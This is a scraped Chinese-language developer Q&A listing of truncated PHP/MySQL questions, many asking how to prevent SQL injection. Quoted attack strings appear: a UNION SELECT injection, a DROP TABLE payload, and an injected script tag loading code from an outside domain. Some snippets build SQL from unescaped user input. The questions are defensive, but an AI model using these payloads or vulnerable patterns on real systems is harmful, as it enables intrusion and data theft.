1回答
我的朋友们的网站被黑了,黑客用SQLMAP从http://example.com/users/users.php?id=3泄露所有的数据库数据
浏览 0提问于2016-08-02得票数 -3
1回答
有人访问了MySQL数据库
、、、、
今天早上有人给我发了电子邮件,告诉我他们访问了我的客户MySQL数据库,并提出用金钱来解决这个问题。我一直在对一个房地产上市网站做一些测试。该网站的设置方式,它现在有property.php?estateID=103和做property.php?estateID=103 union select 1,useraccounts(),3,4,5,6,7拉一个错误回FUNCTION database_table.useraccounts does not exist,我假设这就是帮助黑客获得对我的数据库的访问。我怎么才能阻止这一切?简单的消毒有帮助吗?数据库是MySQL 5.5。
浏览 0提问于2017-05-22得票数 0
2回答
我有一个小的MySQL数据库,有几百行(全部是文本,没有图像)。我使用iQuery请求所有行,并在客户端执行所有筛选。iQuery代码如下:
$(document).ready( function () {
$.get("alldata.php", function(data){
$('#result').text(data);
});
});
在服务器端,"alldata.php“有以下代码,并将JSON中的数据传回iQuery:
$sql = "SELECT title FROM mydatabase
浏览 3提问于2015-08-02得票数 5
回答已采纳
我创建了一个名为CMS的ZendFramework2小模块,以便在我的站点中编写简单的文章。下面这个模块使用Zend 和TableGateway类从数据库中获取数据。
我读过许多关于创建模块的策略的网站和书籍,我更喜欢使用以下文件结构的快捷方式:
.
├── Module.php
├── config
│ └── module.config.php
├── data
│ └── data.sql
├── src
│ └── Cms
│ ├── Controller
│ │ ├── IndexController.php
│ │ ├── P
浏览 0提问于2014-05-23得票数 0
1回答
我的用户认证系统出了问题,我做错了什么?
我试图查询数据库中存储的密码,检查数据库上的密码是否与登录页面中输入的密码相同,然后从那里添加功能。
但就是不起作用。它多次失败,并打印出“对不起,再试一次”。
login.php
$email = $_POST['email'];
$userpass = $_POST['password'];
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($co
浏览 2提问于2015-04-13得票数 1
你好,我已经用PHP和MySQL工作了一段时间了。现在我在PHP-Informix和PHP-Oracle环境中工作。对于进入数据库的数据,我一直使用mysql_real_escape_string。我目前在Informix和Oracle数据库服务器上工作,我不知道有任何用于数据库的转义函数,这些数据库是通过OCI8或odbc等驱动程序连接的。
谁能解释一下这些数据库的安全措施。
浏览 2提问于2011-01-06得票数 2
回答已采纳
我继承了一个php web应用程序,它非常不安全,具有sql注入的历史。我不能立即修复脚本,我更需要它们运行才能让网站运行,而且有太多的php脚本需要首先从php端处理。但是,我完全控制服务器和服务器上的软件,包括对mysql数据库及其用户的完全控制。
让我们估计一下大约300个脚本,40个半私有脚本,20个私有/安全脚本。
因此,我的问题是如何最好地保护数据,并隐含地假设来自php端的sql注入(例如,在300个脚本列表中的某个地方)是不可避免的?
我的第一个草案计划是在mysql数据库中创建多个不同的许可用户层。通过这种方式,我可以保护最需要保护的数据和脚本(“私有/安全”类别),然后是第
浏览 0提问于2011-03-02得票数 6
我在将UDID从iPhone发送到MySQL数据库时遇到了困难。我没有问题的POSTing数据到PHP脚本,但由于某种原因,PHP没有把它放到数据库中。我尝试输入"12343214312“作为我的示例UDID,这是有效的,但由于某些原因,实际的UDID不是。是不是我犯了什么格式错误?
下面是我的PHP代码:
<?php
$udidfromiphone = $_POST['udidfromiphone'];
//Connect To Database
$hostname='HOSTNAME.db.7774297.hostedreso
浏览 0提问于2012-01-30得票数 0
回答已采纳
1回答
我正在尝试构建一个单一的pages.php文件,我也可以传递段塞信息,并使用mod重写使数据库输出看起来像实际的页面。
问题是,代码可以工作,但只适用于传递的整数。如果我通过page_id,它将调用并工作;如果我通过page_slug,它将失败。
这是我重写的规则
RewriteRule ^service/(.*)$ pages.php?pid=$1 [QSA,L]
下面是pages.php中的select查询,我使用require_once(“Database.php”)来调用数据库文件。
$sql = "
SELECT
page_title,
浏览 0提问于2015-04-24得票数 0
回答已采纳
1回答
在连接到数据库时防止SQL注入
、、、、
在最初连接到mySQL数据库时,是否需要验证用户输入?请考虑PHP中的以下示例,其中根据对表单的用户输入(例如,通过允许管理员更改存储在服务器上的文件中的数据库凭据的表单)与数据库进行初始连接:
$mysqli = new PDO('mssqli:host=' . $_REQUEST['host'] . ';dbname=' . $_REQUEST['db'] . ', $_REQUEST['username'], $_REQUEST['password']);
是否需要验证$_REQUES
浏览 3提问于2014-02-25得票数 0
回答已采纳
这是输入部分:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
<input type="hidden" name="ldbal" value="2000">
<input type="submit" name="btn-signup" class="
浏览 8提问于2021-07-05得票数 0
回答已采纳
1回答
我是PHP新手,我制作了一个表单来插入数据库,当我想要插入图像时,我不能插入一个错误,在数据库中,图像的类型是"longblob",我附上了表单和。在数据库中插入PHPto。
表格:
<form align="center" action="guardar.php" method="POST" enctype="multipart/form-data">
<input type="text" REQUIRED name="titulo" placeholde
浏览 0提问于2018-10-19得票数 1
回答已采纳
4回答
我发现我的SQL Server数据库字段被黑客攻击了,如下所示。请注意,Original Content是该字段的现有值,并更改为下面的值。
Original Content</title><script src=http://dfrgcc.com/ur.php></script></title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=6 >crack</a>
我假设这是一个SQL注入攻
浏览 0提问于2011-09-26得票数 4
回答已采纳
1回答
这是我的通用php页面:
<?php
require_once('includes.php');
require_once('cms.class.php');
.....
rest of the page
?>
在includes.php中,初始化了一个名为$db的pro对象,我希望在cms.class.php中指定的类中使用它
includes.php:
$db = new PDO('mysql:host=localhost;dbname=xxxxx','xxxxx','xxxxxx');
$db-
浏览 0提问于2012-04-14得票数 2
回答已采纳
因此,我尝试使用ajax来更新我的sql数据库中的值,方法是获取所单击的链接并在数据库中找到该链接。我不确定为什么它不工作:\
$('.visit').click( function() {
var thisLink = $(this).attr('href');
$.post("visit.php", { link: thisLink});
});
<?php
$link = $_POST['link'];
mysql_query("UPDATE items SET visited = 1 WHERE link
浏览 1提问于2011-03-07得票数 3
3回答
好的,考虑一下这个url:
example.com/single.php?id=21424
对于你和我来说,很明显PHP将获取id并通过mysql查询来运行它,以检索1条记录以将其显示在页面上。
有没有什么恶意的黑客会把这个url搞乱,对我的应用程序/mysql数据库造成安全威胁?
谢谢
浏览 0提问于2011-02-23得票数 8
回答已采纳
3回答
我正在尝试删除数据库中表中的一行,但它不起作用...连接正常。我已经回显了表行id,以确保它可以正常工作,但仍然不会删除...
如果你也需要连接代码,请让我知道。
代码:
<table>
<tr>
<td>Recent Posts</td>
</tr>
<?php while($row = mysql_fetch_array($result)) : ?>
<td><?php echo $row['id']; ?></td>
<td
浏览 0提问于2013-11-23得票数 0
1回答
我对测试非常陌生。我有一个存储书籍和书籍信息的网络应用程序。
如果我调用路由/store/,它会触发store方法,并在数据库中创建一本新书。以下是简化的方法:
Book.php类文件:
public function __construct() {
$this->bookService = new BookService();
}
public function store() {
$input = /* get post input values */
$this->createDatabaseEntry($input);
}
private funct
浏览 0提问于2016-12-27得票数 1
1回答
在iOS中检索SQL数据
、、、、
我目前正在为iPhone编写一个应用程序,我需要从远程托管的MySQL数据库中检索数据。
我决定使用PHP作为我的“中间人”,从SQL检索数据,并将其解析为XML。
我将在与我的MySQL服务器相同的域中托管PHP文件,并在Objective中调用它。示例:
我的问题是,是否存在以这种方式检索信息的安全问题?
我没有传输任何敏感数据,我只是想数据库的完整性等等。
谢谢你们!
浏览 3提问于2011-05-06得票数 1
回答已采纳
4回答
我正在托管一个php文件,其中回显了我在mysql数据库中存储的输出信息,我计划将该文件的名称分发到一个代理php文件中(对于一个跨域的ajax应用程序),它将捕获xml格式的文本。
我需要注意什么才能保证我的服务器/数据库不会被黑客入侵?我关闭了索引(如果你可以下载php文件,你就会有我的连接信息)。
我不能使用htaccess来阻止任何人,因为可能会有随机的服务器访问它。那么除了设置文件的权限之外,我还能做什么呢?
浏览 2提问于2011-01-04得票数 1
回答已采纳
我是PHP新手,一直致力于基于php的通用搜索引擎,以便通过MYSQL数据库进行搜索。我已经在google drive上以goo.gl格式存储了建筑物的图片。我的问题是,我该如何为数据库中列出的url创建超链接,因为在大多数情况下,从数据库中拉出的链接会有所不同。无论是有一个可点击的链接或显示图片都会很棒。
<html>
<head>
<title> Buildings</title>
</head>
<center>
<body>
<?php
include "connection.php&
浏览 0提问于2014-07-05得票数 0
我正在将数据ajax到Wordpress数据库中,并在成功的情况下将写入数据库的文本显示在div中,以便人们可以看到所写的内容
我的代码如下所示:
$.ajax({
type: "POST",
url: "<?php echo get_bloginfo('template_url').'/insert_comment.php';?>",
data: dataString,
cache: false,
success: function(html){
浏览 0提问于2012-01-16得票数 1
回答已采纳
1回答
我有一个包含以下代码的index.php文件,其中我获取存储在数据库中的城市名称,打印所有城市,并为每个城市打印一个按钮。例如:我的数据库中有城市(伦敦、纽约和旧金山),我将有如下内容:
伦敦->巴顿
纽约->巴顿
旧金山->巴顿
<?PHP
while($myrow = pg_fetch_assoc($result)) {
$nameofcity = $myrow[cityname];
echo $nameofcity;
$_SESSION['variabletopass'] = $nameofcity;
e
浏览 3提问于2016-04-07得票数 0
回答已采纳
我是新的PHP,我试图为我的网站开发一个登录系统。我已经成功地登录到我的网站,但现在我试图整理我的代码,并将数据库连接代码放在一个类中,并让其他php类访问一个数据库连接类。目前,我似乎无法连接到我的数据库。我试图通过添加相关的错误报告代码来查找错误,但没有输出任何错误。
如果有人能检查我的代码,看看我哪里出错了,我会很感激的!
下面是我的php类,它检查用户名和密码- checklogin.php。
<?php
require_once(__DIR__. "/DBConnection.php");
class checklogin {
public $co
浏览 2提问于2014-01-27得票数 0
回答已采纳
2回答
有人告诉我,PHP脚本中有一个SQL注入漏洞,它匹配来自后端数据库的“login”和“pass”。编辑:删除代码以保证机密性。
浏览 1提问于2015-03-28得票数 0
1回答
如何创建到数据库的单例连接?
、、、、
我已经开始使用OOP,但我在创建数据库连接类时遇到了问题。
我曾经使用非OOP PHP,所以现在开始学习一些非常难的东西。
你能帮助我创建类或建议一些关于创建和使用类的文章吗?
浏览 0提问于2013-08-28得票数 0
1回答
我在我的网站上,用户可以提交代码部分。我想安全地存储到数据库中。
我正在使用php。我试着使用html purifier将数据保存到数据库中,但它删除了所有代码。
我很感谢你的帮助。
谢谢。
浏览 0提问于2010-12-27得票数 1
回答已采纳
2回答
我正在进行一个包含图像gallery.Now的项目,我希望将点击/计数值的数量存储到我的数据库中(用MySQL开发)。我试图用我自己的方式来做这件事,但问题是,所有图像都以相同的值存储在数据库中,因此存在计数/单击值的问题。
下面给出的代码位于main.php文件中,该文件显示从database.The picture.php检索的图像,该文件是从数据库检索图像的代码。我附加了代码,以计数picture.php中的点击次数,以便每当单击图像时它都会计数。
main.php
$query="SELECT * FROM files";
$result=mys
浏览 5提问于2012-11-13得票数 1
回答已采纳
1回答
无法删除php中的记录
、、、
我已经创建了一个数据库,该数据库显示在网站上,也可以插入值。我在试着删除记录。
这段代码是create.php,它用name age、email、num2和cal创建了一个表单(cal只是添加age和num2来查看计算的工作方式)。我们插入值并显示具有一个名为info. db_connect.php的表的数据库信息,该表将我们连接到数据库并使用该数据库。db()是db_connect.php.中的一个函数
<?php
include "db_connect.php";
if(isset($_POST['submit']))
{
浏览 3提问于2020-05-11得票数 0
回答已采纳
3回答
好吧,所以我已经试了很久了。但我没能成功所以我需要你的帮助。
在另一个文件中,我向数据库提交了条目,没有任何问题,.Now,我创建了一个文件ppp.html文件,以帮助用户更新数据库。这是ppp.html
<html>
<form action="l.php" method="post">
<input type ="text" name ="complaint">
<input type="text" name="dte"><
浏览 2提问于2016-01-13得票数 2
回答已采纳
2回答
我目前正在使用mongoDB,我想知道我们应该采取什么措施来确保任何可能导致问题的数据都不会被存储。我相信像mysql_escape_string这样的普通PHP函数在这里不会有什么帮助。
有没有针对noSQL数据库,特别是mongoDB的SQL注入?
如果是这样的话,我们能做些什么来保护我们免受他们的攻击呢?
浏览 1提问于2010-09-07得票数 7
回答已采纳
1回答
我正在收集一个.NET应用程序的用户输入。数据被发送到MySQL数据库并存储在那里。当需要时,从.NET应用程序中请求数据并在GUI中打印。这一切都很好,完美无瑕。
到目前为止,我正从本地的.NET应用程序直接连接到远程DB。由于这不是一个好主意,我想在这段时间内放置一个‘请求处理程序’:一个简单的.php文件,它在执行所需的操作之前检查用户的权限。
由于我想讨论这个新实现的几个缺陷,我想什么是实现以下目标的最佳选择:
防止用户将非法字符放入数据库中。
尽量保持数据包小。
轻松地将数据包读写到数据库/从数据库中写入数据包。
我不得不承认,我对mysql/php和DBs一般都
浏览 1提问于2013-08-19得票数 0
回答已采纳
2回答
我遇到了这样的问题,我有一个服务注入理论,并使用实体管理器将用户记录插入数据库: UsersService.php。
我有个服务可以发邮件: MyEmailService.php
在services.yml中注入的所有两个服务(遵循这个docs )。他们都很好用。
所以现在我的问题是:我有一个类调用UserFacade.php(没有扩展任何控制器)。它有一个方法"addUser“。在这个函数中,它将调用UserService.php将一条记录插入数据库,然后调用MyEmailService.php向用户的电子邮件发送电子邮件。我怎么才能在交响乐里做到这一点?我是交响乐团的新手。
请帮忙
浏览 2提问于2014-12-04得票数 0
回答已采纳
1回答
我有一个名为.php的functions.php文件,在这里我必须插入函数,例如,我有一个名为db_connect的函数,它连接到我的数据库。
function db_connect()
{
$PDO = new PDO('mysql:host=' . DB_HOST . ';dbname=' . DB_NAME . ';charset=utf8', DB_USER, DB_PASS);
$PDO->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
r
浏览 3提问于2017-06-15得票数 0
回答已采纳
我想问的是,在需要的时候,是否有一个数据库连接的实例或声明新的实例是好的做法?我有以下两种设计:
这是数据库类:
<?php
class Database extends PDO {
//Variable declaration
private $host = "localhost";
private $passwd = "";
private $username = "root";
private $dbname = "";
//Connect to DB when the
浏览 1提问于2014-08-16得票数 3
回答已采纳
1回答
我正在使用PHP在数据库中提交数据,但我希望设置更安全的代码,以便使用SQL注入,但我的一位朋友在10分钟内破解了我的数据。还有其他强SQL注入来保护数据吗?
我试过了
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
$email=$conn->real_escape_string(trim($_POST['email']));
$subject=$conn->real_escape_string(trim($_POST['su
浏览 3提问于2017-08-26得票数 0
1回答
我有一个简单的用户登录脚本。我在SHA1数据库表中将密码加密为mySQL (使用字符集utf8_unicode_ci)。
当我使用值在数据库中运行"$q“时,它会返回结果。但是通过脚本,即使输入正确的凭据,我也无法登录。而且,如果我在两个地方(脚本和数据库)删除加密,它也可以正常工作。如果我转而使用MD5,也会出现同样的问题。
我不知道我错过了什么。我试图回显SHA1输出,结果显示它不同于数据库中可见的加密密码。我也检查了输入中的任何额外空间。请帮我弄清楚是怎么回事。如果你还需要什么就告诉我。提前感谢!
connection.php保存数据库的登录凭据,行如下:
$dbc = mysq
浏览 4提问于2015-05-23得票数 0
回答已采纳
1回答
我已经创建了我自己的主题使用超文本标记语言,CSS,JS其中包含表单(Emp_ID,Emp_Name,地址等)。它具有与MySql的数据库连接。我使用简单的PHP脚本和MySql查询用PHP编写了数据库连接。我打算将这个主题转换成wordpress主题,但是想知道如何在wordpress中使用我的MySql数据库。有没有人能告诉我最基本最简单的方法。如果你知道任何容易获得的教程,请让我知道。任何帮助都是非常感谢的。提前谢谢。干杯... :(
浏览 1提问于2012-01-24得票数 0
回答已采纳
1回答
我一直避免学习PHP和MySQL,因为我在互联网上读到的关于PHP不是一种安全语言的内容,以及数据库的安全风险(SQL等)。
我想要了解的主要问题是,PHP/MySQL代码的糟糕通常会造成何种类型的破坏。换句话说,在编写糟糕的代码、数据库中的信息或整个服务器时,我们要冒什么风险?
我知道这可能是一个复杂的话题,但我只想简单地解释一下,当数据库或PHP脚本被破坏时,什么信息通常会受到影响。
当数据库被破坏时,这是否意味着整个服务器可能面临风险,或者仅仅是数据库及其内容?
当PHP脚本被破坏时,这是否意味着整个服务器可能面临风险,或者仅仅是脚本和任何与内容相关的内容?
浏览 5提问于2014-07-15得票数 0
回答已采纳
在你说之前:我知道密码应该被加密/散列,但我想先记下来:我有这个登录函数和一个SQL数据库。然而,登录功能似乎不起作用,我也不知道为什么。我可能错过了一些愚蠢的东西,但已经为这件事挣扎了一段时间了。任何帮助都将不胜感激!
注意:文件db_connect.php实际上只是与数据库的基本连接,没有什么问题,
FUNCTION.PHP:
<?
function login($username, $password, $con)
{
$myQuery = "SELECT * FROM Members WHERE Username = '$username&
浏览 1提问于2013-12-09得票数 0
1回答
我真的对PDO准备的声明感到困惑。我做了一切,就像它在php.net文档上说的那样。当我将JavaScript插入数据库,然后查询数据库并在页面上输出结果时,它会给出数据库上的JavaScript警报。
PDO是保护用户数据不受这种类型的攻击,还是我们必须自己进行消毒和转义,还是这里缺少了什么。
<?php
try {
$db = new PDO('mysql:host=localhost;dbname=test', "root", "");
} catch ( PDOException $e ) {
浏览 0提问于2014-10-22得票数 2
回答已采纳
我正在为我的网站建立一个标题系统。当用户完成了他们的标题,并想提交,我需要一种方法来插入宽度,高度和位置(左和右属性)到我的数据库中。
我知道我可以使用JavaScript检测元素属性,但这对我没有帮助,因为插入数据库是使用PHP完成的。如何在PHP中检测这些属性,并将它们作为变量存储到数据库中?
任何帮助都将不胜感激。如果您需要任何其他信息,请告诉我。谢谢!
浏览 2提问于2011-11-12得票数 0
回答已采纳
我有一个包含'display‘和'link’值的mysql表。
我想把这些放到一个显示'display‘值的php文件中,这个值是'link’值的超链接
我已经连接到数据库并选择了要显示的适当行,但是我不知道如何为此创建php。
正如你可能知道的,我是一个完全的新手,所以任何答案都是简单的..谢谢你的帮助!
浏览 2提问于2009-02-28得票数 0
回答已采纳
1回答
我刚刚开始学习PHP,所以请耐心等待。我的数据库中有两个表,users和appointments表。appointments表将idUsers作为users表中id字段的外键。我正在尝试根据当前登录的用户显示appointments表中的数据。问题是,它显示来自所有用户的数据,而不是登录的用户的数据。 我正在使用fetch_assoc()从数据库中获取数据。 <?php
while($row = $rows->fetch_assoc()): ?>
<td><?php echo $row['idApp'] ?><
浏览 19提问于2019-05-01得票数 0
1回答
所以我得做个网店。Is还没有真正起作用:( 我做了一个表单,用户可以选择他们的产品颜色,容量和他们想要的数量。所有这些信息我从数据库加载到选项中。(第一块代码)现在我想将选定的选项发送到数据库(用于订单),但由于某些原因变量是空的。因此,我的问题是如何检查选择了哪个选项,以及如何将所选选项的数据发送到数据库。 我尝试将SQL代码放入另一个文件中,并在该文件的表单中更改为action属性。我用SQL语句尝试了很多不同的东西,但我认为这不是问题所在。 <p class="title">Choose your capacity</p>
<form ac
浏览 14提问于2019-04-12得票数 0
我已经阅读了这个建议(示例:将它们存储在php文件中一个无法作为URL访问的位置),但我不禁认为,必须有一种更好的方法来存储/访问数据库凭据。
理想情况下,访问for服务器文件的人不可能获得数据库凭据。这就给the服务器如何获得数据库连接带来了挑战.
如果有一种方法可以在两个不相关的脚本之间传递PDO连接对象,则可能是可能的。
例如:
主网站脚本,运行为www-data需要一个db连接。
以某种方式调用存在于www-data不可读文件中的php函数。
该函数决定是否允许脚本访问数据库(例如,使用调试回溯跟踪,创建所有提到的文件的md5sums (或类似的),将它们与受保护的、已知的、很好的文件
浏览 0提问于2013-05-21得票数 4
回答已采纳
3回答
我正在建立一个有很多jquery / ajax的php网站。基本上,这个网站是一个简单的博客,我在首页显示最后10个数据库条目及其对应的标题。然后,用户可以单击一个标题(重新路由到site.com/ blog ?cid=76),然后查看完整的博客条目。
基本上,在数据库中显示与blog_id对应的76是否存在数据库安全风险?我应该让事情变得更安全吗?如果是的话,我该怎么做呢?
浏览 18提问于2012-07-08得票数 0
回答已采纳
我最近又恢复了我对web开发的“爱好”,回到了PHP。我已经取得了相当大的进步,尽管我仍然觉得我的(以前不存在的)技能有点生疏。我已经看了这段代码很长一段时间了,不知道为什么它不能工作。这段代码过去是可以工作的,所以我非常确定我一定是删除了什么,或者我没有注意到什么重要的东西。
无论哪种方式,这都是我当前的PHP代码,结果是当我登录时,我停留在相同的页面上,基本上看起来什么都没有发生。除了页面只是刷新:
function login($db){
if(!isset($_SESSION['user']) || !isset($_SESSION['user'][&
浏览 2提问于2015-08-07得票数 0
1回答
我正在创建一个网站,当用户可以购买产品。我已经创建了这个网站的管理方面,并试图创建一个页面,管理员一旦登录,可以更新myphpadmin数据库上的某个产品的库存水平。到目前为止,我已经设法让代码在我的数据库中更新,但不会更新到所选的产品。相反,它会创建一个包含库存水平和价格的新记录。我使用下面的命令从上一页获取了产品ID:
echo "<input type=hidden name=h_prodid value=".$stockid.">";
因此,当管理员单击更新链接时,他们会进入一个页面,其中包含该特定产品的当前详细信息。然后,他们输入一个或两个
浏览 0提问于2013-02-04得票数 0
回答已采纳
在SELECT-Query中是否可以使用子查询修改数据库?相关数据库为mysql数据库。
更多细节:相关查询如下所示:
SELECT * FROM table WHERE id = $x
变量$x可以替换为任何内容。唯一的限制是,查询是通过php的mysql_query()执行的,这会阻止执行多个后续查询。在这种情况下,修改数据库将很容易,只需设置
$x = "42; DROP TABLE foo;"
浏览 1提问于2012-02-15得票数 4
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
即时通信 IM
腾讯会议活动推荐
腾讯云开发者
